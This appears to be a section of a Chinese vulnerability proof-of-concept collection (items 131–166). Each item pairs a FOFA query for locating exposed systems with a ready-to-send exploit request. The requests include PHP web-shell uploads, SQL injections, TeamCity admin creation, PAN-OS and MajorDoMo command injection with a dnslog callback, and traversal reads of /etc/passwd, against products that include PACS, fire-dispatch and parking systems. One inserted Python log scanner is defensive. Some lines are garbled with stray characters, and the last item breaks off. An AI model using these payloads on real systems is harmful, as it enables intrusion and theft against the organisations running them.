Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

0 X) @* }* |, ^$ o! R S+ _1 P135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
' X6 a% }" z8 A& [CVE-2024-2022+ U' j$ _' {. |9 _* K
Netentsec NS-ASG Application Security Gateway 6.3版本
: S' K! T$ s, M) A1 G" [3 aFOFA:app="网康科技-NS-ASG安全网关"
% m3 [! x. I" y/ W$ NGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
3 D, X% P9 q) S& ~; M1 {1 uHost: x.x.x.x
' k) p& o: x) B% A* L0 v- ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 P% n/ {! Y( n7 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 O% Z+ P; N" H2 d9 w$ HAccept-Encoding: gzip, deflate
- ~+ h* F* f/ c6 }5 X; BAccept-Language: zh-CN,zh;q=0.94 _8 G1 C4 \7 t" G+ a8 P: T) v
Connection: close
9 ~ b# W$ S$ t3 ` \4 [0 g5 t3 g& R; h
136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

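Added detection example, not code from the article or from any vendor listed above: it scans constructed access-log lines for the base64-wrapped parameters explained in items 122, 144 and 152 (sql, system and the Basic credential) and for the dot-dot traversal requests in items 126, 129, 132 and 147. The log format, the B64_PARAMS list and every sample line are assumptions made for this example.

```python
"""Scan web access logs for the request patterns catalogued above (added
example; the log format, B64_PARAMS and SAMPLE_LOG are assumptions)."""
import base64
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed log format: <client> "<METHOD> <target> HTTP/x.y" <status> basic=<Basic credential or ->
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) basic=(?P<basic>\S+)$'
)
# Query parameters the catalogued POCs use to smuggle base64-wrapped payloads (assumption).
B64_PARAMS = {"sql", "system", "passwd", "url"}
SQL_TOKENS = re.compile(
    r"\b(select|union|sleep|updatexml|extractvalue|database|version|pg_sleep)\b", re.I)
SHELL_TOKENS = re.compile(r"(;|\|\||&&|`|\$\(|\b(id|ls|cat|curl|wget|sh|bash)\b)")


def try_b64(value: str) -> Optional[str]:
    """Decode value as base64 when it looks like base64 and yields printable UTF-8."""
    stripped = value.strip()
    if len(stripped) < 4 or not re.fullmatch(r"[A-Za-z0-9+/=_-]+", stripped):
        return None
    normalised = stripped.replace("-", "+").replace("_", "/")
    normalised += "=" * (-len(normalised) % 4)   # tolerate stripped padding
    try:
        text = base64.b64decode(normalised).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def is_traversal(path: str) -> bool:
    """Percent-decode twice (catches %2e%2e and %252e) and look for a '..' segment."""
    decoded = unquote(unquote(path)).replace("\\", "/")
    return ".." in decoded.split("/")


def classify(name: str, value: str) -> Optional[str]:
    """Label one parameter value, checking the raw and (if applicable) decoded form."""
    candidates = [value]
    decoded = try_b64(value) if name in B64_PARAMS else None
    if decoded is not None:
        candidates.append(decoded)
    for text in candidates:
        if SQL_TOKENS.search(text):
            return f"sqli:{name}"
        if SHELL_TOKENS.search(text):
            return f"cmdi:{name}"
    return None


def analyze(line: str) -> List[str]:
    """Return the findings for one log line (empty list when nothing is suspicious)."""
    match = LOG_RE.match(line)
    if not match:
        return ["unparsable"]
    findings: List[str] = []
    parts = urlsplit(match.group("target"))
    if is_traversal(parts.path):
        findings.append("path-traversal")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        label = classify(name, value)
        if label:
            findings.append(label)
    basic = match.group("basic")
    if basic != "-" and SHELL_TOKENS.search(try_b64(basic) or ""):
        findings.append("cmdi:authorization")   # payload hidden in Basic credentials
    return findings


def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Run analyze over many lines and keep only those with findings."""
    hits = []
    for line in lines:
        findings = analyze(line)
        if findings:
            hits.append((line, findings))
    return hits


# Constructed sample lines modelled on the requests catalogued above.
SAMPLE_LOG = [
    '10.0.0.5 "GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1" 200 basic=-',
    '10.0.0.5 "GET /static/../../../../../etc/passwd HTTP/1.1" 200 basic=-',
    '10.0.0.5 "GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1" 200 basic=-',
    '10.0.0.5 "GET /access/set?param=enableapi&value=1 HTTP/1.1" 200 basic=JztsczsnOmRvZXNub3RtYXR0ZXI=',
    '10.0.0.5 "GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1" 200 basic=-',
    '10.0.0.7 "GET /static/app.js?v=3 HTTP/1.1" 200 basic=-',
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_LOG):
        print(findings, line)
```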
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue combat dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
